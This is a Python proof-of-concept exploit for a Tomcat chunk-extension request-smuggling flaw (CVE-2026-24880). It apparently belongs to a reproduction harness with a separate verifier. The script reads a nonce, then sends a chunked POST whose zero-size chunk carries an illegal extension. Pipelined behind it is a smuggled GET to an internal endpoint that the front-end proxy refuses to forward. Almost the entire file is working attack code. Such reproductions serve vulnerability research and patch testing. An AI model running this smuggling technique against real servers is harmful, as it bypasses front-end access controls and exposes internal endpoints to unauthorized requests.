#!/usr/bin/env python3
"""
CVE-2026-24880 — Apache Tomcat ChunkedInputFilter chunk-extension request smuggling.

Drives the vulnerable front-end -> back-end path:

  1. Reads the fresh per-boot nonce from the sanctioned endpoint GET /public/nonce
     (value-agnostic: the nonce is learned at runtime, never baked in).
  2. Sends ONE outer request `POST /public/ingest` with a chunked body whose final
     (size 0) chunk carries an RFC-illegal chunk-extension (`;ext=/x`). The vulnerable
     ChunkedInputFilter swallows the extension bytes without validation; a fixed
     ChunkedInputFilter (9.0.116+) rejects the '/' via its ChunkExtension state machine
     and 400s the whole request.
  3. Immediately pipelines a smuggled inner request
        GET /internal/arrival?nonce=<nonce> HTTP/1.1
     right after the terminating CRLF of the chunked body. The byte-pump front-end
     forwards the body verbatim; on the vulnerable back-end the outer chunked request
     completes and the inner request is re-parsed by Tomcat as an independent request,
     reaching /internal/arrival — an endpoint the front-end refuses to forward as an
     outer request (403). The back-end then appends "ARRIVAL <nonce>" to its arrival log.

The script does NOT verify success; it only triggers the bug and prints what it sent
and what the back-end returned on the wire. The verifier confirms the arrival
out-of-band.

Usage:
    python3 smuggle.py <host> <port>
"""

import socket
import sys


def read_nonce(host, port):
    req = (
        "GET /public/nonce HTTP/1.1\r\n"
        "Host: x\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()
    s = socket.create_connection((host, port), timeout=10)
    s.sendall(req)
    s.settimeout(10)
    data = b""
    while True:
        d = s.recv(4096)
        if not d:
            break
        data += d
    s.close()
    if b"\r\n\r\n" not in data:
        return ""
    head, body = data.split(b"\r\n\r\n", 1)
    # The back-end serves /public/nonce with Transfer-Encoding: chunked, so the body is
    # chunked-encoded. Decode it to recover the raw nonce (do not treat the chunk-size
    # line as the value).
    if b"transfer-encoding: chunked" in head.lower():
        body = dechunk(body)
    return body.decode("latin-1").strip()


def dechunk(body):
    out = b""
    i = 0
    while i < len(body):
        j = body.find(b"\r\n", i)
        if j == -1:
            break
        size_line = body[i:j].split(b";", 1)[0].strip()
        try:
            size = int(size_line, 16)
        except ValueError:
            break
        if size == 0:
            break
        start = j + 2
        out += body[start:start + size]
        i = start + size + 2  # skip chunk data + trailing CRLF
    return out


def smuggle(host, port, nonce):
    # Inner (smuggled) request — reachable ONLY via the chunk-extension bug.
    inner = (
        "GET /internal/arrival?nonce=" + nonce + " HTTP/1.1\r\n"
        "Host: x\r\n"
        "\r\n"
    )
    # Outer benign request. Final chunk size 0 with an RFC-illegal chunk-extension.
    # The '/' in the extension value is valid-to-swallow for the VULNERABLE parser but
    # is rejected by the FIXED ChunkExtension state machine (-> 400 on a patched build).
    outer = (
        "POST /public/ingest HTTP/1.1\r\n"
        "Host: x\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    )
    body = "0;ext=/x\r\n\r\n"
    wire = outer.encode() + body.encode() + inner.encode()

    sys.stderr.write("[*] wire bytes sent to %s:%s:\n%r\n" % (host, port, wire))

    s = socket.create_connection((host, port), timeout=10)
    s.sendall(wire)
    s.settimeout(6)
    data = b""
    try:
        while True:
            d = s.recv(4096)
            if not d:
                break
            data += d
    except socket.timeout:
        # keep-alive connection may stay open after both responses; that's fine.
        pass
    s.close()
    return data


def main():
    if len(sys.argv) != 3:
        sys.stderr.write("usage: smuggle.py <host> <port>\n")
        sys.exit(2)
    host = sys.argv[1]
    port = int(sys.argv[2])

    nonce = read_nonce(host, port)
    if not nonce:
        sys.stderr.write("[!] failed to read nonce from /public/nonce\n")
        sys.exit(1)
    sys.stderr.write("[*] fresh boot nonce read from /public/nonce: %s\n" % nonce)

    resp = smuggle(host, port, nonce)
    sys.stdout.write("[*] back-end response bytes on the connection:\n")
    sys.stdout.write(repr(resp) + "\n")


if __name__ == "__main__":
    main()
